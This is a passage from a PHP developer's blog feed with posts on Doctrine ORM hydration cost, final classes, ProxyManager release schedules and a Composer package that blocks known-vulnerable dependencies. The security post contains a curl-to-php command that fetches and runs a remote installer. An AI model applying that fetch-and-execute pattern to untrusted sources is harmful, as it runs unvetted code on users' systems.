            $this->id,
            $this->charge
        );
    }

    // ... 
}

The command handler is also massively simplified, since all it does is forwarding the required dependencies to the aggregate:

final class HandleCheckOutShoppingCart
{
    // ... 

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $this
            ->shoppingCarts
            ->get($command->shoppingCart())
            ->checkOut($command, $this->gateway);
    }
}

Conclusions

Besides getting rid of the command handler in the scenario tests, here is a list of advantages of what we just implemented:

  1. The domain logic is all in one place, easy to read and easy to change.
  2. We can run the domain without infrastructure code (note: the payment gateway is a domain service)
  3. We can prevent invalid interactions to happen without having to push verification data across multiple layers
  4. Our aggregate is now able to fullfill its main role: being a domain-specific state machine, preventing invalid state mutations.
  5. If something goes wrong, then the aggregate is able to revert state mutations.
  6. We can raise domain events on failures, or execute custom domain logic.

The approach described here fits any kind of application where there is a concept of Entity or Aggregate. Feel free to stuff your entity API with business logic!

Just remember that entities should only be self-aware, and only context-aware in the context of certain business interactions: don't inject or statically access domain services from within an entity.

]]>
<![CDATA[ProxyManager 2.0.0 release and expected 2.x lifetime]]> 2016-01-29T00:00:00+00:00 https://ocramius.github.io/blog/proxy-manager-2-0-0-release/ ProxyManager

ProxyManager 2.0.0 was finally released today!

It took a bit more than a year to get here, but major improvements were included in this release, along with exclusive PHP 7 support.

Most of the features that we planned to provide were indeed implemented into this release.

As a negative note, HHVM compatibility was not achieved, as HHVM is not yet compatible with PHP 7.0.x-compliant code.

As of this release, ProxyManager 1.0.x switches to security-only support.

Planned maintenance schedule

ProxyManager 2.x will be a maintenance-only release:

  • I plan to fix bugs until
  • I plan to fix security issues until

No features are going to be added to ProxyManager 2.x: the current master branch will instead become the development branch for version 3.0.0.

Features for ProxyManager 3.0.0 are yet to be planned, but we reached exceptional code quality, complete test coverage and nice performance improvements with 2.0.0: the future is bright!

Thank you!

And of course, a big "thank you" to all those who contributed to this release!

]]>
<![CDATA[Doctrine ORM Hydration Performance Optimization]]> 2015-04-13T00:00:00+00:00 https://ocramius.github.io/blog/doctrine-orm-optimization-hydration/ PRE-REQUISITE: Please note that this article explains complexity in internal ORM operations with the Big-O notation. Consider reading this article, if you are not familiar with the Big-O syntax.

What is hydration?

Doctrine ORM, like most ORMs, is performing a process called Hydration when converting database results into objects.

This process usually involves reading a record from a database result and then converting the column values into an object's properties.

Here is a little pseudo-code snippet that shows what a mapper is actually doing under the hood:

<?php

$results          = [];
$reflectionFields = $mappingInformation->reflectionFields();

foreach ($resultSet->fetchRow() as $row) {
    $object = new $mappedClassName;

    foreach ($reflectionFields as $column => $reflectionField) {
        $reflectionField->setValue($object, $row[$column]);
    }

    $results[] = $object;
}

return $results;

That's a very basic example, but this gives you an idea of what an ORM is doing for you.

As you can see, this is an O(N) operation (assuming a constant number of reflection fields).

There are multiple ways to speed up this particular process, but we can only remove constant overhead from it, and not actually reduce it to something more efficient.

When is hydration expensive?

Hydration starts to become expensive with complex resultsets.

Consider the following SQL query:

SELECT
    u.id       AS userId,
    u.username AS userUsername,
    s.id       AS socialAccountId,
    s.username AS socialAccountUsername,
    s.type     AS socialAccountType
FROM
    user u
LEFT JOIN
    socialAccount s
        ON s.userId = u.id

Assuming that the relation from user to socialAccount is a one-to-many, this query retrieves all the social accounts for all the users in our application

A resultset may be as follows:

userId userUsername socialAccountId socialAccountUsername socialAccountType
1 [email protected] 20 ocramius Facebook
1 [email protected] 21 @ocramius Twitter
1 [email protected] 22 ocramiusaethril Last.fm
2 [email protected] NULL NULL NULL
3 [email protected] 85 awesomegrandma9917 Facebook

As you can see, we are now joining 2 tables in the results, and the ORM has to perform more complicated operations:

Hydrate 1
User object for [email protected]
Hydrate 3
SocialAccount instances into User#$socialAccounts for [email protected], while skipping re-hydrating User [email protected]
Hydrate 1
User object for [email protected]
Skip hydrating
User#$socialAccounts for [email protected], as no social accounts are associated
Hydrate 1
User object for [email protected]
Hydrate 1
SocialAccount instance into User#$socialAccounts for [email protected]

DOCS This operation is what is done by Doctrine ORM when you use the DQL Fetch Joins feature.

Fetch joins are a very efficient way to hydrate multiple records without resorting to multiple queries, but there are two performance issues with this approach (both not being covered by this article):

  • Empty records require some useless looping inside the ORM internals (see [email protected]'s social account). This is a quick operation, but we can't simply ignore those records upfront.
  • If multiple duplicated records are being joined (happens a lot in many-to-many associations), then we want to de-duplicate records by keeping a temporary in-memory identifier map.

Additionally, our operation starts to become more complicated, as it is now O(n * m), with n and m being the records in the user and the socialAccount tables.

What the ORM is actually doing here is normalizing data that was fetched in a de-normalized resultset, and that is going through your CPU and your memory.

Bringing hydration cost to an extreme

The process of hydration becomes extremely expensive when more than 2 LEFT JOIN operations clauses are part of our queries:

SELECT
    u.id         AS userId,
    u.username   AS userUsername,
    sa.id        AS socialAccountId,
    sa.username  AS socialAccountUsername,
    sa.type      AS socialAccountType,
    s.id         AS sessionId,
    s.expiresOn  AS sessionExpiresOn,
FROM
    user u
LEFT JOIN
    socialAccount sa
        ON sa.userId = u.id
LEFT JOIN
    session s
        ON s.userId = u.id

This kind of query produces a much larger resultset, and the results are duplicated by a lot:

userId user Username social Account Id social Account Username social Account Type session Id session Expires On
1 [email protected] 20 ocramius Facebook ocramius-macbook 2015-04-20 22:08:56
1 [email protected] 21 @ocramius Twitter ocramius-macbook 2015-04-20 22:08:56
1 [email protected] 22 ocramiusaethril Last.fm ocramius-macbook 2015-04-20 22:08:56
1 [email protected] 20 ocramius Facebook ocramius-android 2015-04-20 22:08:56
1 [email protected] 21 @ocramius Twitter ocramius-android 2015-04-20 22:08:56
1 [email protected] 22 ocramiusaethril Last.fm ocramius-android 2015-04-20 22:08:56
2 [email protected] NULL NULL NULL NULL NULL
3 [email protected] 85 awesomegrandma Facebook home-pc 2015-04-15 10:05:31

If you try to re-normalize this resultset, you can actually see how many useless de-duplication operation have to happen.

That is because the User [email protected] has multiple active sessions on multiple devices, as well as multiple social accounts.

SLOW! The hydration operations on this resultset are O(n * m * q), which I'm going to simply generalize as O(n ^ m), with n being the amount of results, and m being the amount of joined tables.

Here is a graphical representation of O(n ^ m):

Boy, that escalated quickly

Yes, it is bad.

How to avoid O(n ^ m) hydration?

O(n ^ m) can be avoided with some very simple, yet effective approaches.

No, it's not "don't use an ORM", you muppet.

Avoiding one-to-many and many-to-many associations

Collection valued associations are as useful as problematic, as you never know how much data you are going to load.

Unless you use fetch="EXTRA_LAZY" and Doctrine\Common\Collections\Collection#slice() wisely, you will probably make your app crash if you initialize a very large collection of associated objects.

Therefore, the simplest yet most limiting advice is to avoid collection-valued associations whenever they are not strictly necessary.

Additionally, reduce the amount of bi-directional associations to the strict necessary.

After all, code that is not required should not be written in first place.

Multi-step hydration

The second approach is simpler, and allows us to exploit how the ORM's UnitOfWork is working internally.

In fact, we can simply split hydration for different associations into different queries, or multiple steps:

SELECT
    u.id         AS userId,
    u.username   AS userUsername,
    s.id         AS socialAccountId,
    s.username   AS socialAccountUsername,
    s.type       AS socialAccountType
FROM
    user u
LEFT JOIN
    socialAccount s
        ON s.userId = u.id

We already know this query: hydration for it is O(n * m), but that's the best we can do, regardless of how we code it.

SELECT
    u.id        AS userId,
    u.username  AS userUsername,
    s.id        AS sessionId,
    s.expiresOn AS sessionExpiresOn,
FROM
    user u
LEFT JOIN
    session s
        ON s.userId = u.id

This query is another O(n * m) hydration one, but we are now only loading the user sessions in the resultsets, avoiding duplicate results overall.

By re-fetching the same users, we are telling the ORM to re-hydrate those objects (which are now in memory, stored in the UnitOfWork): that fills the User#$sessions collections.

Also, please note that we could have used a JOIN instead of a LEFT JOIN, but that would have triggered lazy-loading on the sessions for the [email protected] User

Additionally, we could also skip the userUsername field from the results, as it already is in memory and well known.

SOLUTION: We now reduced the hydration complexity from O(n ^ m) to O(n * m * k), with n being the amount of User instances, m being the amount of associated to-many results, and k being the amount of associations that we want to hydrate.

Coding multi-step hydration in Doctrine ORM

Let's get more specific and code the various queries represented above in DQL.

Here is the O(n ^ m) query (in this case, O(n ^ 3)):

return $entityManager
    ->createQuery('
        SELECT
            user, socialAccounts, sessions 
        FROM
            User user
        LEFT JOIN
            user.socialAccounts socialAccounts
        LEFT JOIN
            user.sessions sessions
    ')
    ->getResult();

This is how you'd code the multi-step hydration approach:

$users = $entityManager
    ->createQuery('
        SELECT
            user, socialAccounts
        FROM
            User user
        LEFT JOIN
            user.socialAccounts socialAccounts
    ')
    ->getResult();

$entityManager
    ->createQuery('
        SELECT PARTIAL
            user.{id}, sessions
        FROM
            User user
        LEFT JOIN
            user.sessions sessions
    ')
    ->getResult(); // result is discarded (this is just re-hydrating the collections)

return $users;

I'd also add that this is the only legitimate use-case for partial hydration that I ever had, but it's a personal opinion/feeling.

Other alternatives (science fiction)

As you may have noticed, all this overhead is caused by normalizing de-normalized data coming from the DB.

Other solutions that we may work on in the future include:

  • Generating hydrator code - solves constant overhead issues, performs better with JIT engines such as HHVM
  • Leveraging the capabilities of powerful engines such as PostgreSQL, which comes with JSON support (since version 9.4), and would allow us to normalize the fetched data to some extent
  • Generate more complex SQL, creating an own output format that is "hydrator-friendly" (re-inventing the wheel here seems like a bad idea)

Research material

Just so you stop thinking that I pulled out all these thought out of thin air, here is a repository with actual code examples that you can run, measure, compare and patch yourself:

https://github.com/Ocramius/Doctrine2StepHydration

Give it a spin and see the results for yourself!

]]>
<![CDATA[When to declare classes final]]> 2015-01-06T00:00:00+00:00 https://ocramius.github.io/blog/when-to-declare-classes-final/ TL;DR: Make your classes always final, if they implement an interface, and no other public methods are defined

In the last month, I had a few discussions about the usage of the final marker on PHP classes.

The pattern is recurrent:

  1. I ask for a newly introduced class to be declared as final
  2. the author of the code is reluctant to this proposal, stating that final limits flexibility
  3. I have to explain that flexibility comes from good abstractions, and not from inheritance

It is therefore clear that coders need a better explanation of when to use final, and when to avoid it.

There are many other articles about the subject, but this is mainly thought as a "quick reference" for those that will ask me the same questions in future.

When to use "final":

final should be used whenever possible.

Why do I have to use final?

There are numerous reasons to mark a class as final: I will list and describe those that are most relevant in my opinion.

1. Preventing massive inheritance chain of doom

Developers have the bad habit of fixing problems by providing specific subclasses of an existing (not adequate) solution. You probably saw it yourself with examples like following:

<?php

class Db { /* ... */ }
class Core extends Db { /* ... */ }
class User extends Core { /* ... */ }
class Admin extends User { /* ... */ }
class Bot extends Admin { /* ... */ }
class BotThatDoesSpecialThings extends Bot { /* ... */ }
class PatchedBot extends BotThatDoesSpecialThings { /* ... */ }

This is, without any doubts, how you should NOT design your code.

The approach described above is usually adopted by developers who confuse OOP with "a way of solving problems via inheritance" ("inheritance-oriented-programming", maybe?).

2. Encouraging composition

In general, preventing inheritance in a forceful way (by default) has the nice advantage of making developers think more about composition.

There will be less stuffing functionality in existing code via inheritance, which, in my opinion, is a symptom of haste combined with feature creep.

Take the following naive example:

<?php

class RegistrationService implements RegistrationServiceInterface
{
    public function registerUser(/* ... */) { /* ... */ }
}

class EmailingRegistrationService extends RegistrationService
{
    public function registerUser(/* ... */) 
    {
        $user = parent::registerUser(/* ... */);

        $this->sendTheRegistrationMail($user);

        return $user;
    }

    // ...
}

By making the RegistrationService final, the idea behind EmailingRegistrationService being a child-class of it is denied upfront, and silly mistakes such as the previously shown one are easily avoided:

<?php

final class EmailingRegistrationService implements RegistrationServiceInterface
{
    public function __construct(RegistrationServiceInterface $mainRegistrationService) 
    {
        $this->mainRegistrationService = $mainRegistrationService;
    }

    public function registerUser(/* ... */) 
    {
        $user = $this->mainRegistrationService->registerUser(/* ... */);

        $this->sendTheRegistrationMail($user);

        return $user;
    }

    // ...
}

3. Force the developer to think about user public API

Developers tend to use inheritance to add accessors and additional API to existing classes:

<?php

class RegistrationService implements RegistrationServiceInterface
{
    protected $db;

    public function __construct(DbConnectionInterface $db) 
    {
        $this->db = $db;
    }

    public function registerUser(/* ... */) 
    {
        // ...

        $this->db->insert($userData);

        // ...
    }
}

class SwitchableDbRegistrationService extends RegistrationService
{
    public function setDb(DbConnectionInterface $db)
    {
        $this->db = $db;
    }
}

This example shows a set of flaws in the thought-process that led to the SwitchableDbRegistrationService:

  • The setDb method is used to change the DbConnectionInterface at runtime, which seems to hide a different problem being solved: maybe we need a MasterSlaveConnection instead?
  • The setDb method is not covered by the RegistrationServiceInterface, therefore we can only use it when we strictly couple our code with the SwitchableDbRegistrationService, which defeats the purpose of the contract itself in some contexts.
  • The setDb method changes dependencies at runtime, and that may not be supported by the RegistrationService logic, and may as well lead to bugs.
  • Maybe the setDb method was introduced because of a bug in the original implementation: why was the fix provided this way? Is it an actual fix or does it only fix a symptom?

There are more issues with the setDb example, but these are the most relevant ones for our purpose of explaining why final would have prevented this sort of situation upfront.

4. Force the developer to shrink an object's public API

Since classes with a lot of public methods are very likely to break the SRP, it is often true that a developer will want to override specific API of those classes.

Starting to make every new implementation final forces the developer to think about new APIs upfront, and about keeping them as small as possible.

5. A final class can always be made extensible

Coding a new class as final also means that you can make it extensible at any point in time (if really required).

No drawbacks, but you will have to explain your reasoning for such change to yourself and other members in your team, and that discussion may lead to better solutions before anything gets merged.

6. extends breaks encapsulation

Unless the author of a class specifically designed it for extension, then you should consider it final even if it isn't.

Extending a class breaks encapsulation, and can lead to unforeseen consequences and/or BC breaks: think twice before using the extends keyword, or better, make your classes final and avoid others from having to think about it.

7. You don't need that flexibility

One argument that I always have to counter is that final reduces flexibility of use of a codebase.

My counter-argument is very simple: you don't need that flexibility.

Why do you need it in first place? Why can't you write your own customized implementation of a contract? Why can't you use composition? Did you carefully think about the problem?

If you still need to remove the final keyword from an implementation, then there may be some other sort of code-smell involved.

8. You are free to change the code

Once you made a class final, you can change it as much as it pleases you.

Since encapsulation is guaranteed to be maintained, the only thing that you have to care about is that the public API.

Now you are free to rewrite everything, as many times as you want.

When to avoid final:

Final classes only work effectively under following assumptions:

  1. There is an abstraction (interface) that the final class implements
  2. All of the public API of the final class is part of that interface

If one of these two pre-conditions is missing, then you will likely reach a point in time when you will make the class extensible, as your code is not truly relying on abstractions.

An exception can be made if a particular class represents a set of constraints or concepts that are totally immutable, inflexible and global to an entire system. A good example is a mathematical operation: $calculator->sum($a, $b) will unlikely change over time. In these cases, it is safe to assume that we can use the final keyword without an abstraction to rely on first.

Another case where you do not want to use the final keyword is on existing classes: that can only be done if you follow semver and you bump the major version for the affected codebase.

Try it out!

After having read this article, consider going back to your code, and if you never did so, adding your first final marker to a class that you are planning to implement.

You will see the rest just getting in place as expected.

]]>
<![CDATA[ProxyManager 1.0.0 release and expected 1.x lifetime]]> 2014-12-12T00:00:00+00:00 https://ocramius.github.io/blog/proxy-manager-1-0-0-release/ ProxyManager

Today I finally released version 1.0.0 of the ProxyManager

Noticeable improvements since 0.5.2:

Planned maintenance schedule

ProxyManager 1.x will be a maintenance-release only:

  • I plan to fix bugs until
  • I plan to fix security issues until

No features are going to be added to ProxyManager 1.x: the current master branch will instead become the development branch for version 2.0.0.

ProxyManager 2.0.0 targets

ProxyManager 2.0.0 has following main aims:

Thank you!

It wouldn't be a good 1.0.0 release without thanking all the contributors that helped with the project, by providing patches, bug reports and their useful insights to the project. Here are the most notable ones:

]]>
<![CDATA[roave/security-advisories: Composer against Security Vulnerabilities]]> 2014-12-11T00:00:00+00:00 https://ocramius.github.io/blog/roave-security-advisories-protect-against-composer-packages-with-security-issues/

Since it's almost christmas, it's also time to release a new project!

The Roave Team is pleased to announce the release of roave/security-advisories, a package that keeps known security issues out of your project.

Before telling you more, go grab it:

mkdir roave-security-advisories-test
cd roave-security-advisories-test
curl -sS https://getcomposer.org/installer | php --

./composer.phar require roave/security-advisories:dev-master

Hold on: I will tell you what to do with it in a few.

What is it?

roave/security-advisories is a composer package that prevents installation of packages with known security issues.

Yet another one?

Last year, Fabien Potencier announced the security.sensiolabs.org project. This october, he announced again that the project was being moved to the open-source FriendsOfPHP organization.

While I like the idea of integrating security checks with my CI, I don't like the fact that it is possible to install and run harmful software before those checks.
I also don't want to install and run an additional CLI tool for something that composer can provide directly.

That's why I had the idea of just compiling a list of conflict versions from into a composer metapackage:

Why?

This has various advantages:

  • No files or actual dependencies are added to the project, since a "metapackage" does not provide a vendor directory by itself
  • Packages with security issues are filtered out during dependency resolution: they will not even be downloaded
  • No more CLI tool to run separately, no more CI setup steps
  • No need to upgrade the tool separately
  • No coupling or version constraints with any dependencies used by similar CLI-based alternatives

Try it out!

Now that you installed roave/security-advisories, you can try out how it works:

cd roave-security-advisories-test

./composer.phar require symfony/symfony:2.5.2 # this will fail
./composer.phar require zendframework/zendframework:2.3.1 # this will fail
./composer.phar require symfony/symfony:~2.6 # works!
./composer.phar require zendframework/zendframework:~2.3 # works!

Simple enough!

Please just note that this only works when adding new dependencies or when running composer update: security issues in your composer.lock cannot be checked with this technique.

Why is there no tagged version?

Because of how composer dependency resolution works, it is not possible to have more than one version of roave/security-advisories other than dev-master. More about this is on the project page


Fin

]]>